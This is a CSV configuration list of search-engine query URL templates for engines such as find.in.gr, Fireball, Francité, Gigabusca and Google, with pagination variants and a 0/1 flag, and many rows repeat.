"International","find.in.gr 8","http://find.in.gr/results.page?page=8&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 8","http://find.in.gr/results.page?page=8&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 8","http://find.in.gr/results.page?page=8&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 9","http://find.in.gr/results.page?page=9&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 9","http://find.in.gr/results.page?page=9&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 9","http://find.in.gr/results.page?page=9&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 9","http://find.in.gr/results.page?page=9&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 9","http://find.in.gr/results.page?page=9&channel=1&data={SEARCH_KEYWORD}","0"
"International","find.in.gr 9","http://find.in.gr/results.page?page=9&channel=1&data={SEARCH_KEYWORD}","0"
"International","FindLink GR","http://www.findlink.gr/searching.asp?key={SEARCH_KEYWORD}&logic=any","0"
"International","FindLink GR","http://www.findlink.gr/searching.asp?key={SEARCH_KEYWORD}&logic=any","0"
"International","FindLink GR","http://www.findlink.gr/searching.asp?key={SEARCH_KEYWORD}&logic=any","0"
"International","FindLink GR","http://www.findlink.gr/searching.asp?key={SEARCH_KEYWORD}&logic=any","0"
"International","FindLink GR","http://www.findlink.gr/searching.asp?key={SEARCH_KEYWORD}&logic=any","0"
"International","FindLink GR","http://www.findlink.gr/searching.asp?key={SEARCH_KEYWORD}&logic=any","0"
"International","FindWhat","http://findwhat.com/results.asp?MT={SEARCH_KEYWORD}&DC=25&filter_pref=0","0"
"International","FindWhat","http://findwhat.com/results.asp?MT={SEARCH_KEYWORD}&DC=25&filter_pref=0","0"
"International","FindWhat","http://findwhat.com/results.asp?MT={SEARCH_KEYWORD}&DC=25&filter_pref=0","0"
"International","Fireball DE","http://suche.fireball.de/suche.csp?mode=express&rnd=8123&ocr=on&q={SEARCH_KEYWORD}&what=german_web","1"
"International","Fireball DE","http://suche.fireball.de/suche.csp?mode=express&rnd=8123&ocr=on&q={SEARCH_KEYWORD}&what=german_web","0"
"International","Fireball DE","http://suche.fireball.de/suche.csp?mode=express&rnd=8123&ocr=on&q={SEARCH_KEYWORD}&what=german_web","0"
"International","Fireball DE","http://suche.fireball.de/suche.csp?mode=express&rnd=8123&ocr=on&q={SEARCH_KEYWORD}&what=german_web","0"
"International","Fireball DE","http://suche.fireball.de/suche.csp?mode=express&rnd=8123&ocr=on&q={SEARCH_KEYWORD}&what=german_web","0"
"International","Fireball DE","http://suche.fireball.de/suche.csp?mode=express&rnd=8123&ocr=on&q={SEARCH_KEYWORD}&what=german_web","0"
"International","Fireball DE 2 (Next 10)","http://suche.fireball.de/suche.csp?mode=express&rnd=8123&ocr=on&q={SEARCH_KEYWORD}&what=german_web&stq=10","1"
"International","Fireball DE 2 (Next 10)","http://suche.fireball.de/suche.csp?mode=express&rnd=8123&ocr=on&q={SEARCH_KEYWORD}&what=german_web&stq=10","0"
"International","Fireball DE 2 (Next 10)","http://suche.fireball.de/suche.csp?mode=express&rnd=8123&ocr=on&q={SEARCH_KEYWORD}&what=german_web&stq=10","0"
"International","Fireball DE 2 (Next 10)","http://suche.fireball.de/suche.csp?mode=express&rnd=8123&ocr=on&q={SEARCH_KEYWORD}&what=german_web&stq=10","0"
"International","Fireball DE 2 (Next 10)","http://suche.fireball.de/suche.csp?mode=express&rnd=8123&ocr=on&q={SEARCH_KEYWORD}&what=german_web&stq=10","0"
"International","Fireball DE 2 (Next 10)","http://suche.fireball.de/suche.csp?mode=express&rnd=8123&ocr=on&q={SEARCH_KEYWORD}&what=german_web&stq=10","0"
"International","Fireball DE 3 (Next 10)","http://suche.fireball.de/suche.csp?mode=express&rnd=8123&ocr=on&q={SEARCH_KEYWORD}&what=german_web&stq=20","1"
"International","Fireball DE 3 (Next 10)","http://suche.fireball.de/suche.csp?mode=express&rnd=8123&ocr=on&q={SEARCH_KEYWORD}&what=german_web&stq=20","0"
"International","Fireball DE 3 (Next 10)","http://suche.fireball.de/suche.csp?mode=express&rnd=8123&ocr=on&q={SEARCH_KEYWORD}&what=german_web&stq=20","0"
"International","Fireball DE 3 (Next 10)","http://suche.fireball.de/suche.csp?mode=express&rnd=8123&ocr=on&q={SEARCH_KEYWORD}&what=german_web&stq=20","0"
"International","Fireball DE 3 (Next 10)","http://suche.fireball.de/suche.csp?mode=express&rnd=8123&ocr=on&q={SEARCH_KEYWORD}&what=german_web&stq=20","0"
"International","Fireball DE 3 (Next 10)","http://suche.fireball.de/suche.csp?mode=express&rnd=8123&ocr=on&q={SEARCH_KEYWORD}&what=german_web&stq=20","0"
"International","Fireball DE 4 (Next 10)","http://suche.fireball.de/suche.csp?mode=express&rnd=8123&ocr=on&q={SEARCH_KEYWORD}&what=german_web&stq=30","1"
"International","Fireball DE 4 (Next 10)","http://suche.fireball.de/suche.csp?mode=express&rnd=8123&ocr=on&q={SEARCH_KEYWORD}&what=german_web&stq=30","0"
"International","Fireball DE 4 (Next 10)","http://suche.fireball.de/suche.csp?mode=express&rnd=8123&ocr=on&q={SEARCH_KEYWORD}&what=german_web&stq=30","0"
"International","Fireball DE 4 (Next 10)","http://suche.fireball.de/suche.csp?mode=express&rnd=8123&ocr=on&q={SEARCH_KEYWORD}&what=german_web&stq=30","0"
"International","Fireball DE 4 (Next 10)","http://suche.fireball.de/suche.csp?mode=express&rnd=8123&ocr=on&q={SEARCH_KEYWORD}&what=german_web&stq=30","0"
"International","Fireball DE 4 (Next 10)","http://suche.fireball.de/suche.csp?mode=express&rnd=8123&ocr=on&q={SEARCH_KEYWORD}&what=german_web&stq=30","0"
"International","Fireball DE 5 (Next 10)","http://suche.fireball.de/suche.csp?mode=express&rnd=8123&ocr=on&q={SEARCH_KEYWORD}&what=german_web&stq=40","1"
"International","Fireball DE 5 (Next 10)","http://suche.fireball.de/suche.csp?mode=express&rnd=8123&ocr=on&q={SEARCH_KEYWORD}&what=german_web&stq=40","0"
"International","Fireball DE 5 (Next 10)","http://suche.fireball.de/suche.csp?mode=express&rnd=8123&ocr=on&q={SEARCH_KEYWORD}&what=german_web&stq=40","0"
"International","Fireball DE 5 (Next 10)","http://suche.fireball.de/suche.csp?mode=express&rnd=8123&ocr=on&q={SEARCH_KEYWORD}&what=german_web&stq=40","0"
"International","Fireball DE 5 (Next 10)","http://suche.fireball.de/suche.csp?mode=express&rnd=8123&ocr=on&q={SEARCH_KEYWORD}&what=german_web&stq=40","0"
"International","Fireball DE 5 (Next 10)","http://suche.fireball.de/suche.csp?mode=express&rnd=8123&ocr=on&q={SEARCH_KEYWORD}&what=german_web&stq=40","1"
"International","Francité","http://recherche.francite.com/cgi-win/recherche.exe?name={SEARCH_KEYWORD}&voir=webquebec","1"
"International","Francité","http://recherche.francite.com/cgi-win/recherche.exe?name={SEARCH_KEYWORD}&voir=webquebec","0"
"International","Francité","http://recherche.francite.com/cgi-win/recherche.exe?name={SEARCH_KEYWORD}&voir=webquebec","0"
"International","Francité","http://recherche.francite.com/cgi-win/recherche.exe?name={SEARCH_KEYWORD}&voir=webquebec","0"
"International","Francité","http://recherche.francite.com/cgi-win/recherche.exe?name={SEARCH_KEYWORD}&voir=webquebec","0"
"International","Francité","http://recherche.francite.com/cgi-win/recherche.exe?name={SEARCH_KEYWORD}&voir=webquebec","0"
"International","Francité 2 (Next 10)","http://recherche.francite.com/cgi-win/recherche.exe?name={SEARCH_KEYWORD}&total=10&quelrech=ou&ortho=exact","1"
"International","Francité 2 (Next 10)","http://recherche.francite.com/cgi-win/recherche.exe?name={SEARCH_KEYWORD}&total=10&quelrech=ou&ortho=exact","0"
"International","Francité 2 (Next 10)","http://recherche.francite.com/cgi-win/recherche.exe?name={SEARCH_KEYWORD}&total=10&quelrech=ou&ortho=exact","0"
"International","Francité 2 (Next 10)","http://recherche.francite.com/cgi-win/recherche.exe?name={SEARCH_KEYWORD}&total=10&quelrech=ou&ortho=exact","0"
"International","Francité 2 (Next 10)","http://recherche.francite.com/cgi-win/recherche.exe?name={SEARCH_KEYWORD}&total=10&quelrech=ou&ortho=exact","0"
"International","Francité 2 (Next 10)","http://recherche.francite.com/cgi-win/recherche.exe?name={SEARCH_KEYWORD}&total=10&quelrech=ou&ortho=exact","0"
"International","Francité 3 (Next 10)","http://recherche.francite.com/cgi-win/recherche.exe?name={SEARCH_KEYWORD}&total=20&quelrech=ou&ortho=exact","1"
"International","Francité 3 (Next 10)","http://recherche.francite.com/cgi-win/recherche.exe?name={SEARCH_KEYWORD}&total=20&quelrech=ou&ortho=exact","0"
"International","Francité 3 (Next 10)","http://recherche.francite.com/cgi-win/recherche.exe?name={SEARCH_KEYWORD}&total=20&quelrech=ou&ortho=exact","0"
"International","Francité 3 (Next 10)","http://recherche.francite.com/cgi-win/recherche.exe?name={SEARCH_KEYWORD}&total=20&quelrech=ou&ortho=exact","0"
"International","Francité 3 (Next 10)","http://recherche.francite.com/cgi-win/recherche.exe?name={SEARCH_KEYWORD}&total=20&quelrech=ou&ortho=exact","0"
"International","Francité 3 (Next 10)","http://recherche.francite.com/cgi-win/recherche.exe?name={SEARCH_KEYWORD}&total=20&quelrech=ou&ortho=exact","0"
"International","Francité 4 (Next 10)","http://recherche.francite.com/cgi-win/recherche.exe?name={SEARCH_KEYWORD}&total=30&quelrech=ou&ortho=exact","1"
"International","Francité 4 (Next 10)","http://recherche.francite.com/cgi-win/recherche.exe?name={SEARCH_KEYWORD}&total=30&quelrech=ou&ortho=exact","0"
"International","Francité 4 (Next 10)","http://recherche.francite.com/cgi-win/recherche.exe?name={SEARCH_KEYWORD}&total=30&quelrech=ou&ortho=exact","0"
"International","Francité 4 (Next 10)","http://recherche.francite.com/cgi-win/recherche.exe?name={SEARCH_KEYWORD}&total=30&quelrech=ou&ortho=exact","0"
"International","Francité 4 (Next 10)","http://recherche.francite.com/cgi-win/recherche.exe?name={SEARCH_KEYWORD}&total=30&quelrech=ou&ortho=exact","0"
"International","Francité 4 (Next 10)","http://recherche.francite.com/cgi-win/recherche.exe?name={SEARCH_KEYWORD}&total=30&quelrech=ou&ortho=exact","1"
"International","Francité 5 (Next 10)","http://recherche.francite.com/cgi-win/recherche.exe?name={SEARCH_KEYWORD}&total=40&quelrech=ou&ortho=exact","1"
"International","Francité 5 (Next 10)","http://recherche.francite.com/cgi-win/recherche.exe?name={SEARCH_KEYWORD}&total=40&quelrech=ou&ortho=exact","0"
"International","Francité 5 (Next 10)","http://recherche.francite.com/cgi-win/recherche.exe?name={SEARCH_KEYWORD}&total=40&quelrech=ou&ortho=exact","0"
"International","Francité 5 (Next 10)","http://recherche.francite.com/cgi-win/recherche.exe?name={SEARCH_KEYWORD}&total=40&quelrech=ou&ortho=exact","0"
"International","Francité 5 (Next 10)","http://recherche.francite.com/cgi-win/recherche.exe?name={SEARCH_KEYWORD}&total=40&quelrech=ou&ortho=exact","0"
"International","Francité 5 (Next 10)","http://recherche.francite.com/cgi-win/recherche.exe?name={SEARCH_KEYWORD}&total=40&quelrech=ou&ortho=exact","0"
"International","Franco Moteur","http://www.franco-moteur.com/s?k={SEARCH_KEYWORD}&m=t","1"
"International","Franco Moteur","http://www.franco-moteur.com/s?k={SEARCH_KEYWORD}&m=t","0"
"International","Franco Moteur","http://www.franco-moteur.com/s?k={SEARCH_KEYWORD}&m=t","0"
"International","Franco Moteur 2 (Next 8)","http://www.franco-moteur.com/s?k={SEARCH_KEYWORD}&b=8&m=t&t=1056465013406","1"
"International","Franco Moteur 2 (Next 8)","http://www.franco-moteur.com/s?k={SEARCH_KEYWORD}&b=8&m=t&t=1056465013406","0"
"International","Franco Moteur 2 (Next 8)","http://www.franco-moteur.com/s?k={SEARCH_KEYWORD}&b=8&m=t&t=1056465013406","0"
"International","Franco Moteur 3 (Next 8)","http://www.franco-moteur.com/s?k={SEARCH_KEYWORD}&b=16&m=t&t=1056465097078","1"
"International","Franco Moteur 3 (Next 8)","http://www.franco-moteur.com/s?k={SEARCH_KEYWORD}&b=16&m=t&t=1056465097078","0"
"International","Franco Moteur 3 (Next 8)","http://www.franco-moteur.com/s?k={SEARCH_KEYWORD}&b=16&m=t&t=1056465097078","0"
"International","Franco Moteur 4 (Next 8)","http://www.franco-moteur.com/s?k={SEARCH_KEYWORD}&b=24&m=t&t=1056465162343","1"
"International","Franco Moteur 4 (Next 8)","http://www.franco-moteur.com/s?k={SEARCH_KEYWORD}&b=24&m=t&t=1056465162343","0"
"International","Franco Moteur 4 (Next 8)","http://www.franco-moteur.com/s?k={SEARCH_KEYWORD}&b=24&m=t&t=1056465162343","0"
"International","Franco Moteur 5 (Next 8)","http://www.franco-moteur.com/s?k={SEARCH_KEYWORD}&b=32&m=t&t=1056465183812","1"
"International","Franco Moteur 5 (Next 8)","http://www.franco-moteur.com/s?k={SEARCH_KEYWORD}&b=32&m=t&t=1056465183812","0"
"International","Franco Moteur 5 (Next 8)","http://www.franco-moteur.com/s?k={SEARCH_KEYWORD}&b=32&m=t&t=1056465183812","0"
"International","Gigabusca Br","http://gigabusca.teta.8x.com.br/rapido.cgi?search=web&query={SEARCH_KEYWORD}","1"
"International","Gigabusca Br","http://gigabusca.teta.8x.com.br/rapido.cgi?search=web&query={SEARCH_KEYWORD}","0"
"International","Gigabusca Br","http://gigabusca.teta.8x.com.br/rapido.cgi?search=web&query={SEARCH_KEYWORD}","0"
"International","Gigabusca Br","http://gigabusca.teta.8x.com.br/rapido.cgi?search=web&query={SEARCH_KEYWORD}","0"
"International","Gigabusca Br","http://gigabusca.teta.8x.com.br/rapido.cgi?search=web&query={SEARCH_KEYWORD}","0"
"International","Gigabusca Br","http://gigabusca.teta.8x.com.br/rapido.cgi?search=web&query={SEARCH_KEYWORD}","0"
"International","Gigabusca Br 2 (Next 20)","http://www.gigabusca.com.br/google.cgi?search=web&query={SEARCH_KEYWORD}&&start=2","1"
"International","Gigabusca Br 2 (Next 20)","http://www.gigabusca.com.br/google.cgi?search=web&query={SEARCH_KEYWORD}&&start=2","0"
"International","Gigabusca Br 2 (Next 20)","http://www.gigabusca.com.br/google.cgi?search=web&query={SEARCH_KEYWORD}&&start=2","0"
"International","Gigabusca Br 2 (Next 20)","http://www.gigabusca.com.br/google.cgi?search=web&query={SEARCH_KEYWORD}&&start=2","0"
"International","Gigabusca Br 2 (Next 20)","http://www.gigabusca.com.br/google.cgi?search=web&query={SEARCH_KEYWORD}&&start=2","0"
"International","Gigabusca Br 2 (Next 20)","http://www.gigabusca.com.br/google.cgi?search=web&query={SEARCH_KEYWORD}&&start=2","0"
"International","Gigabusca Br 3 (Next 20)","http://www.gigabusca.com.br/google.cgi?search=web&query={SEARCH_KEYWORD}&&start=3","1"
"International","Gigabusca Br 3 (Next 20)","http://www.gigabusca.com.br/google.cgi?search=web&query={SEARCH_KEYWORD}&&start=3","0"
"International","Gigabusca Br 3 (Next 20)","http://www.gigabusca.com.br/google.cgi?search=web&query={SEARCH_KEYWORD}&&start=3","0"
"International","Gigabusca Br 3 (Next 20)","http://www.gigabusca.com.br/google.cgi?search=web&query={SEARCH_KEYWORD}&&start=3","0"
"International","Gigabusca Br 3 (Next 20)","http://www.gigabusca.com.br/google.cgi?search=web&query={SEARCH_KEYWORD}&&start=3","0"
"International","Gigabusca Br 3 (Next 20)","http://www.gigabusca.com.br/google.cgi?search=web&query={SEARCH_KEYWORD}&&start=3","0"
"International","Gigabusca Br 4 (Next 20)","http://www.gigabusca.com.br/google.cgi?search=web&query={SEARCH_KEYWORD}&&start=4","1"
"International","Gigabusca Br 4 (Next 20)","http://www.gigabusca.com.br/google.cgi?search=web&query={SEARCH_KEYWORD}&&start=4","0"
"International","Gigabusca Br 4 (Next 20)","http://www.gigabusca.com.br/google.cgi?search=web&query={SEARCH_KEYWORD}&&start=4","0"
"International","Gigabusca Br 4 (Next 20)","http://www.gigabusca.com.br/google.cgi?search=web&query={SEARCH_KEYWORD}&&start=4","0"
"International","Gigabusca Br 4 (Next 20)","http://www.gigabusca.com.br/google.cgi?search=web&query={SEARCH_KEYWORD}&&start=4","0"
"International","Gigabusca Br 4 (Next 20)","http://www.gigabusca.com.br/google.cgi?search=web&query={SEARCH_KEYWORD}&&start=4","0"
"International","Gigabusca Br 5 (Next 20)","http://www.gigabusca.com.br/google.cgi?search=web&query={SEARCH_KEYWORD}&&start=5","1"
"International","Gigabusca Br 5 (Next 20)","http://www.gigabusca.com.br/google.cgi?search=web&query={SEARCH_KEYWORD}&&start=5","0"
"International","Gigabusca Br 5 (Next 20)","http://www.gigabusca.com.br/google.cgi?search=web&query={SEARCH_KEYWORD}&&start=5","0"
"International","Gigabusca Br 5 (Next 20)","http://www.gigabusca.com.br/google.cgi?search=web&query={SEARCH_KEYWORD}&&start=5","0"
"International","Gigabusca Br 5 (Next 20)","http://www.gigabusca.com.br/google.cgi?search=web&query={SEARCH_KEYWORD}&&start=5","0"
"International","Gigabusca Br 5 (Next 20)","http://www.gigabusca.com.br/google.cgi?search=web&query={SEARCH_KEYWORD}&&start=5","0"
"International","Google","http://www.google.com/search?hl=en&q={SEARCH_KEYWORD}&num=100","1"
"International","Google","http://www.google.com.mx/search?hl=en&q={SEARCH_KEYWORD}&num=100","0"
"International","Google","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google","http://www.google.com/search?hl=en&q={SEARCH_KEYWORD}&num=100","0"
"International","Google","http://www.google.com.mx/search?hl=en&q={SEARCH_KEYWORD}&num=100","0"
"International","Google","http://www.google.com/search?hl=en&q={SEARCH_KEYWORD}&num=100","0"
"International","Google","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google","http://www.google.com.mx/search?hl=en&q={SEARCH_KEYWORD}&num=100","0"
"International","Google 10 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&start=900&sa=N","1"
"International","Google 10 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=900&sa=N","0"
"International","Google 10 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=900&sa=N","0"
"International","Google 10 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&start=900&sa=N","0"
"International","Google 10 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&start=900&sa=N","0"
"International","Google 10 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=900&sa=N","0"
"International","Google 2 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&start=100&sa=N","1"
"International","Google 2 (Next 100)","http://www.google.com.mx/search?q={SEARCH_KEYWORD}&num=100&start=100&sa=N","0"
"International","Google 2 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google 2 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google 2 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&start=100&sa=N","0"
"International","Google 2 (Next 100)","http://www.google.com.mx/search?q={SEARCH_KEYWORD}&num=100&start=100&sa=N","0"
"International","Google 2 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&start=100&sa=N","0"
"International","Google 2 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google 2 (Next 100)","http://www.google.com.mx/search?q={SEARCH_KEYWORD}&num=100&start=100&sa=N","0"
"International","Google 3 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&start=200&sa=N","1"
"International","Google 3 (Next 100)","http://www.google.com.mx/search?q={SEARCH_KEYWORD}&num=100&start=200&sa=N","0"
"International","Google 3 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google 3 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google 3 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&start=200&sa=N","0"
"International","Google 3 (Next 100)","http://www.google.com.mx/search?q={SEARCH_KEYWORD}&num=100&start=200&sa=N","0"
"International","Google 3 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&start=200&sa=N","0"
"International","Google 3 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google 3 (Next 100)","http://www.google.com.mx/search?q={SEARCH_KEYWORD}&num=100&start=200&sa=N","0"
"International","Google 4 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&start=300&sa=N","1"
"International","Google 4 (Next 100)","http://www.google.com.mx/search?q={SEARCH_KEYWORD}&num=100&start=300&sa=N","0"
"International","Google 4 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google 4 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google 4 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&start=300&sa=N","0"
"International","Google 4 (Next 100)","http://www.google.com.mx/search?q={SEARCH_KEYWORD}&num=100&start=300&sa=N","0"
"International","Google 4 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&start=300&sa=N","0"
"International","Google 4 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=300&sa=N","0"
"International","Google 4 (Next 100)","http://www.google.com.mx/search?q={SEARCH_KEYWORD}&num=100&start=300&sa=N","0"
"International","Google 5 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&start=400&sa=N","1"
"International","Google 5 (Next 100)","http://www.google.com.mx/search?q={SEARCH_KEYWORD}&num=100&start=400&sa=N","0"
"International","Google 5 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google 5 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google 5 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&start=400&sa=N","0"
"International","Google 5 (Next 100)","http://www.google.com.mx/search?q={SEARCH_KEYWORD}&num=100&start=400&sa=N","0"
"International","Google 5 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&start=400&sa=N","0"
"International","Google 5 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=400&sa=N","0"
"International","Google 5 (Next 100)","http://www.google.com.mx/search?q={SEARCH_KEYWORD}&num=100&start=400&sa=N","0"
"International","Google 6 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&start=500&sa=N","1"
"International","Google 6 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=500&sa=N","0"
"International","Google 6 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=500&sa=N","0"
"International","Google 6 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&start=500&sa=N","0"
"International","Google 6 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&start=500&sa=N","0"
"International","Google 6 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=500&sa=N","0"
"International","Google 7 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&start=60&sa=N","1"
"International","Google 7 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=600&sa=N","0"
"International","Google 7 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=600&sa=N","0"
"International","Google 7 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&start=60&sa=N","0"
"International","Google 7 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&start=60&sa=N","0"
"International","Google 7 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=600&sa=N","0"
"International","Google 8 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&start=700&sa=N","1"
"International","Google 8 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=700&sa=N","0"
"International","Google 8 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=700&sa=N","0"
"International","Google 8 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&start=700&sa=N","0"
"International","Google 8 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&start=700&sa=N","0"
"International","Google 8 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=700&sa=N","0"
"International","Google 9 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&start=800&sa=N","1"
"International","Google 9 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=800&sa=N","0"
"International","Google 9 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=800&sa=N","0"
"International","Google 9 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&start=800&sa=N","0"
"International","Google 9 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&start=800&sa=N","0"
"International","Google 9 (Next 100)","http://www.google.com/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=800&sa=N","0"
"International","Google At","http://www.google.at/search?q={SEARCH_KEYWORD}&ie=UTF-8&oe=UTF-8&hl=de&meta=","1"
"International","Google At","http://www.google.at/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google At","http://www.google.at/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google At","http://www.google.at/search?q={SEARCH_KEYWORD}&ie=UTF-8&oe=UTF-8&hl=de&meta=","0"
"International","Google At","http://www.google.at/search?q={SEARCH_KEYWORD}&ie=UTF-8&oe=UTF-8&hl=de&meta=","0"
"International","Google At","http://www.google.at/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=0&sa=N","0"
"International","Google At 2 (Next 100)","http://www.google.at/search?q={SEARCH_KEYWORD}&num=100&hl=de&lr=&ie=UTF-8&oe=UTF-8&start=100&sa=N","1"
"International","Google At 2 (Next 100)","http://www.google.at/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google At 2 (Next 100)","http://www.google.at/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google At 2 (Next 100)","http://www.google.at/search?q={SEARCH_KEYWORD}&num=100&hl=de&lr=&ie=UTF-8&oe=UTF-8&start=100&sa=N","0"
"International","Google At 2 (Next 100)","http://www.google.at/search?q={SEARCH_KEYWORD}&num=100&hl=de&lr=&ie=UTF-8&oe=UTF-8&start=100&sa=N","0"
"International","Google At 2 (Next 100)","http://www.google.at/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=100&sa=N","0"
"International","Google At 3 (Next 100)","http://www.google.at/search?q={SEARCH_KEYWORD}&num=100&hl=de&lr=&ie=UTF-8&oe=UTF-8&start=200&sa=N","1"
"International","Google At 3 (Next 100)","http://www.google.at/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google At 3 (Next 100)","http://www.google.at/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google At 3 (Next 100)","http://www.google.at/search?q={SEARCH_KEYWORD}&num=100&hl=de&lr=&ie=UTF-8&oe=UTF-8&start=200&sa=N","0"
"International","Google At 3 (Next 100)","http://www.google.at/search?q={SEARCH_KEYWORD}&num=100&hl=de&lr=&ie=UTF-8&oe=UTF-8&start=200&sa=N","0"
"International","Google At 3 (Next 100)","http://www.google.at/search?q={SEARCH_KEYWORD}&num=100&hl=en&lr=&ie=UTF-8&start=200&sa=N","0"
"International","Google At 4 (Next 100)","http://www.google.at/search?q={SEARCH_KEYWORD}&num=100&hl=de&lr=&ie=UTF-8&oe=UTF-8&start=300&sa=N","1"
